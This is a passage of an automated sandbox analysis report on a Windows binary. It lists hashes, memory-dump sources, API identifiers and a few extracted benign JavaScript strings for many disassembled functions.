                                                                                                                                                                            • Opcode Fuzzy Hash: fc80a38f84d8b1e51c9f1ab55edaf59f604e24cdd39e5698dc947f378b48ed39
                                                                                                                                                                            • Instruction Fuzzy Hash: 7C31D231108E0C8FFB54EB98D888B6B73D0FB69304F100419E09BDB5A2CB72E841CB82
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            • Opcode ID: dbf76419f223492eb4d567d1ddfead33f015857671d4f618bff8f034f41251d9
                                                                                                                                                                            • Instruction ID: 6c263f3e3c9b71ad765239aab7dbf68ab30fa7ea82048f8a88211ea05d5d337c
                                                                                                                                                                            • Opcode Fuzzy Hash: dbf76419f223492eb4d567d1ddfead33f015857671d4f618bff8f034f41251d9
                                                                                                                                                                            • Instruction Fuzzy Hash: C831A631208E0C8FEB55EB5CD88C7AB77D1FB69314F000569E49AD75A2DA72E805CF82
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            • Opcode ID: 724891deb70f6bab97fdbecb20f7882af71e6b5afc024078879898faf6915d7b
                                                                                                                                                                            • Instruction ID: e9734ee5bd1a371fc7f84117c07b2553ea5c54c9ebabff6b629846f640589f93
                                                                                                                                                                            • Opcode Fuzzy Hash: 724891deb70f6bab97fdbecb20f7882af71e6b5afc024078879898faf6915d7b
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A31C631108E4C8FEB55EB58D88876B73D1FB79305F000519E49BD7696DA71E905CF42
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            • Opcode ID: 3501a55cac674ec943a4107704978858b696d4dcc1e684f7dc7953510d33aca6
                                                                                                                                                                            • Instruction ID: 62f1b12fb3dabe9bc97078f03f66d17c9577fabd66e9a7104884670012d10a13
                                                                                                                                                                            • Opcode Fuzzy Hash: 3501a55cac674ec943a4107704978858b696d4dcc1e684f7dc7953510d33aca6
                                                                                                                                                                            • Instruction Fuzzy Hash: FC31C630208E0C8FEB56EB59D88876773D0FB6A318F000519E49BD75AADB72E905CF42
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            • Opcode ID: 007529ccd9f2093f6cbd3ea33164f1a428c34247ba089f6e8a7b46865526f79e
                                                                                                                                                                            • Instruction ID: f1867677d06ca0853d435cb120131b9e742c581f04e5e9c9c83e0847665254a8
                                                                                                                                                                            • Opcode Fuzzy Hash: 007529ccd9f2093f6cbd3ea33164f1a428c34247ba089f6e8a7b46865526f79e
                                                                                                                                                                            • Instruction Fuzzy Hash: BD31D230208E0C8FFB5AEF59D888B6777D1FB69318F100429D09AD7592DA72E841CF42
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            • Opcode ID: 25ec4776e4338027b196f5614ee73a8b8353bbf72d8fa38d4934d826f919c06f
                                                                                                                                                                            • Instruction ID: e9e3999276774e26dd5ea42caab790491e9fb4d1f4abf8aa5357d7d25f514079
                                                                                                                                                                            • Opcode Fuzzy Hash: 25ec4776e4338027b196f5614ee73a8b8353bbf72d8fa38d4934d826f919c06f
                                                                                                                                                                            • Instruction Fuzzy Hash: 3731BB31218E1C4FEB55EF5CD8887AB77D0FB69318F00055AE09AD7592DA75E805CF82
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            • Opcode ID: 36a46e987eec6efcde8bae8a05a4e734d5a5e009e9c00953979c006a253adb4b
                                                                                                                                                                            • Instruction ID: 3c11a9e032ee778029bdd13769d61ad1ea6da749bfeb864e95b5b789df853dda
                                                                                                                                                                            • Opcode Fuzzy Hash: 36a46e987eec6efcde8bae8a05a4e734d5a5e009e9c00953979c006a253adb4b
                                                                                                                                                                            • Instruction Fuzzy Hash: 6031B431108E0C8FFB59EB68D888B6A77E0FB69304F110459E09BD7692DA72E845CF42
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            • Opcode ID: f5e824b2dde862fc8a5caf3f520fa1d0980ed76ea4d730938b0c4883bc113c9d
                                                                                                                                                                            • Instruction ID: 3743b5ff61fd40da750a7f4eb4a57b8070649251c2e7698b27210c3d61ca1af9
                                                                                                                                                                            • Opcode Fuzzy Hash: f5e824b2dde862fc8a5caf3f520fa1d0980ed76ea4d730938b0c4883bc113c9d
                                                                                                                                                                            • Instruction Fuzzy Hash: CE31B430248E0C8FEB55FB58D8887A777D1FB69318F000569E09BD7596CA72E905CF42
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            • Opcode ID: f72df842b82b4a430b4d027ead144aca89143fcd5ebe3d3ae9cdc68471bc4dd1
                                                                                                                                                                            • Instruction ID: a7b89ddb98a9bf4f5660e8d5c24d69e145b737fece7caf3398a7beb78c583824
                                                                                                                                                                            • Opcode Fuzzy Hash: f72df842b82b4a430b4d027ead144aca89143fcd5ebe3d3ae9cdc68471bc4dd1
                                                                                                                                                                            • Instruction Fuzzy Hash: 7E31A630218A0C8FEB95EF58D8C87A777E1FB65314F100469E09AD7592DA72EC05CF82
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            • Opcode ID: 0e0b4bc94f2b3c7afd887f05d336140725c02ad7d302b9a78c8a1559e9cda62f
                                                                                                                                                                            • Instruction ID: f32493b54f0f31fc6b283f384eb2fe16567cfeeaaea9e19b644b7fee00d25a50
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e0b4bc94f2b3c7afd887f05d336140725c02ad7d302b9a78c8a1559e9cda62f
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C319230208E0C8FFB95FB58D888B6677D1FB65314F100419E09AD75A2DE76E841CB42
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                                                            • Opcode ID: 9ecde91bfa52677a9f7eb40db556c6463bf84d91d5f91572ceb0c1cf1e3b6d3d
                                                                                                                                                                            • Instruction ID: ebb8c1f5c61561a9c3309fa3eb96a55d8ecfce845fa4703fcd64f623e21d1b82
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ecde91bfa52677a9f7eb40db556c6463bf84d91d5f91572ceb0c1cf1e3b6d3d
                                                                                                                                                                            • Instruction Fuzzy Hash: 5531B231108E1C8FFB55EB58D889B6773D0FB69314F110459E09BDB692CA72E8458F42
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: clear$writeCertHolder$writeUrl
                                                                                                                                                                            • API String ID: 2864223729-602964746
                                                                                                                                                                            • Opcode ID: 74eddcdd334a2c9c2e5f23f69571097230d9db3d42dde3e5f1c445be364f4105
                                                                                                                                                                            • Instruction ID: 90a3346c92dee146387a14bcbeac28c0a09c934f9097f0f4ce7978c5b2d3b258
                                                                                                                                                                            • Opcode Fuzzy Hash: 74eddcdd334a2c9c2e5f23f69571097230d9db3d42dde3e5f1c445be364f4105
                                                                                                                                                                            • Instruction Fuzzy Hash: 5DC1C363B09A4685EF20EB79D4503ADA372EB84B94F848931DE4E177A6DF2CD445C320
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __std_exception_copy$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: "$/
                                                                                                                                                                            • API String ID: 946306463-2662438755
                                                                                                                                                                            • Opcode ID: f7ed9c186e3a81dd1a682e2aebc4cc29138fbac1561feb00ddfc614076276cc6
                                                                                                                                                                            • Instruction ID: b16f857272dcae3045ec5e876fecf6404c988e96d0a362baae9cbd5de601a72d
                                                                                                                                                                            • Opcode Fuzzy Hash: f7ed9c186e3a81dd1a682e2aebc4cc29138fbac1561feb00ddfc614076276cc6
                                                                                                                                                                            • Instruction Fuzzy Hash: 1241D670528E4C8FE745EF28C488BA6B7E0FBB9309F40565AF489D7161EB7595C4CB02
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: bcb3347809ea7c851934b0305064a050f26a5a7b9fb4b15840b7aa05143bec80
                                                                                                                                                                            • Instruction ID: cecc932bf2cae85c3bb82ffe64d8aeb671104c687f45f3c1c3ec20c4fad8d676
                                                                                                                                                                            • Opcode Fuzzy Hash: bcb3347809ea7c851934b0305064a050f26a5a7b9fb4b15840b7aa05143bec80
                                                                                                                                                                            • Instruction Fuzzy Hash: 95E15A33A09B8689EB20DF34E8802ADB7B5FB44788F848535DA8D47B69EF38D554C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Concurrency::cancel_current_task$Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2973761340-0
                                                                                                                                                                            • Opcode ID: bf22bb379a8e7632d8d336ecfe290394dbc84d542f62b966fb0ca8af05395837
                                                                                                                                                                            • Instruction ID: b007465a430a423464bf0b8faf4e08bf471b9634f0a21841e2bbcdb7bc947e4e
                                                                                                                                                                            • Opcode Fuzzy Hash: bf22bb379a8e7632d8d336ecfe290394dbc84d542f62b966fb0ca8af05395837
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F71A070918A1D8BEF65EF58C8157EE77F1EF18708F00015AA895E7A96DA32D805CBC2
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_string_utf16_set
                                                                                                                                                                            • String ID: writeCertHolder
                                                                                                                                                                            • API String ID: 255155458-1003169611
                                                                                                                                                                            • Opcode ID: d0a7c4daa1f959a05897b3b2dcf5f3f1fe2954a2e7fa7dbed87265f6e0748687
                                                                                                                                                                            • Instruction ID: 2190a869d31918c829a51d82ebd2e46986ac144a9d6c5ae4b3aec6547ad950a2
                                                                                                                                                                            • Opcode Fuzzy Hash: d0a7c4daa1f959a05897b3b2dcf5f3f1fe2954a2e7fa7dbed87265f6e0748687
                                                                                                                                                                            • Instruction Fuzzy Hash: D2128023B09A4284EF20EF75D4943ADA7B2EB44B94F949436DE4E57BA9DF38D444C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: &$/
                                                                                                                                                                            • API String ID: 1109970293-2578988991
                                                                                                                                                                            • Opcode ID: be6b46890b10a345fbdaeb7d30acd3836647471af38061ebdf142676a04330be
                                                                                                                                                                            • Instruction ID: 2a1cccfc6ab3b83a6a5ba64eb9f26c812a168346c8aa785db829135d3e2ff3d1
                                                                                                                                                                            • Opcode Fuzzy Hash: be6b46890b10a345fbdaeb7d30acd3836647471af38061ebdf142676a04330be
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A31B670528A8C8FE745EF28C48876AB7E0FBA9308F50565EF489D3261DB76D5C4CB06
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • var __scInternalExt = __scInternalExt || {};__scInternalExt.CustomScrollbar = function(activeCssColor, inactiveCssColor, widthCss, paddingCss) { activeCssColor = activeCssColor || 'rgba(89,115,143,1.0)'; inactiveCssColor = inactiveCssColor || 'rgba(51,74,99,, xrefs: 00007FF79CFCEC1F
                                                                                                                                                                            • scene/custom-scrollbars, xrefs: 00007FF79CFCEC31
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: scene/custom-scrollbars$var __scInternalExt = __scInternalExt || {};__scInternalExt.CustomScrollbar = function(activeCssColor, inactiveCssColor, widthCss, paddingCss) { activeCssColor = activeCssColor || 'rgba(89,115,143,1.0)'; inactiveCssColor = inactiveCssColor || 'rgba(51,74,99,
                                                                                                                                                                            • API String ID: 2864223729-265620315
                                                                                                                                                                            • Opcode ID: c987cfb99b51a5a0c7cea09e1d20a60c389df5f98c8ebe295881995ee0159720
                                                                                                                                                                            • Instruction ID: 38a87b00071f3c9c9c4daf620506f3d424c1fd0b13b7286ede2c7a0326e551da
                                                                                                                                                                            • Opcode Fuzzy Hash: c987cfb99b51a5a0c7cea09e1d20a60c389df5f98c8ebe295881995ee0159720
                                                                                                                                                                            • Instruction Fuzzy Hash: E4319E23A0DA8391EE20EB28E490379A7B1FFC5794F948535E68D436A9DF3CD545CB20
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • scene/disable-select, xrefs: 00007FF79CFCED51
                                                                                                                                                                            • var __scInternalExt = __scInternalExt || {};__scInternalExt.DisableTextSelect = function() { var el = null; var ready = false; var init = function() { if (ready) { return true;} if (!el) { el = document.createElement('style'); i, xrefs: 00007FF79CFCED3F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: scene/disable-select$var __scInternalExt = __scInternalExt || {};__scInternalExt.DisableTextSelect = function() { var el = null; var ready = false; var init = function() { if (ready) { return true;} if (!el) { el = document.createElement('style'); i
                                                                                                                                                                            • API String ID: 2864223729-2350028965
                                                                                                                                                                            • Opcode ID: 21d5c8da703922d565a4f325fabe9ba14340b9f5ce19cb1083d9820fda97c75a
                                                                                                                                                                            • Instruction ID: 1231f6f74cc2c1c94c6718330f8fdd8e9914c7ee8004772e260a8d8fbb5d3dec
                                                                                                                                                                            • Opcode Fuzzy Hash: 21d5c8da703922d565a4f325fabe9ba14340b9f5ce19cb1083d9820fda97c75a
                                                                                                                                                                            • Instruction Fuzzy Hash: F931702360DA8791EE20EB28E4903A9A7B1FFC5794F948135E68D436A9DF3CC545C720
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __std_exception_copy__std_exception_destroy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2960854011-0
                                                                                                                                                                            • Opcode ID: bd92f64d335261570e5d26f6f9255d8f4051e18708e87215bc64ab645aac3861
                                                                                                                                                                            • Instruction ID: ec6a9f0b5650b2d2d8b08ff909bb2ae34629e20f2127edfb5282b05ef1e7ff57
                                                                                                                                                                            • Opcode Fuzzy Hash: bd92f64d335261570e5d26f6f9255d8f4051e18708e87215bc64ab645aac3861
                                                                                                                                                                            • Instruction Fuzzy Hash: 38F14F70A08F0D8FDB85EF58D488AA9B7F1FB69305F00416AE44AD7661EB31E944CF81
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 593203224-0
                                                                                                                                                                            • Opcode ID: af466333a9729f9682caa3f8c0ad6bbb8cf15438e78ccc876ba822118fb2a79a
                                                                                                                                                                            • Instruction ID: 7f5b8fc0e42fc3caf72fe8efa5ec33ea4a716393cb60b880fb66e380327c3308
                                                                                                                                                                            • Opcode Fuzzy Hash: af466333a9729f9682caa3f8c0ad6bbb8cf15438e78ccc876ba822118fb2a79a
                                                                                                                                                                            • Instruction Fuzzy Hash: FB510631114E0C8FEB94EF18D489BA777E0FB65308F40056EE499D76A2DA36E841CF82
                                                                                                                                                                            Memory Dump Source
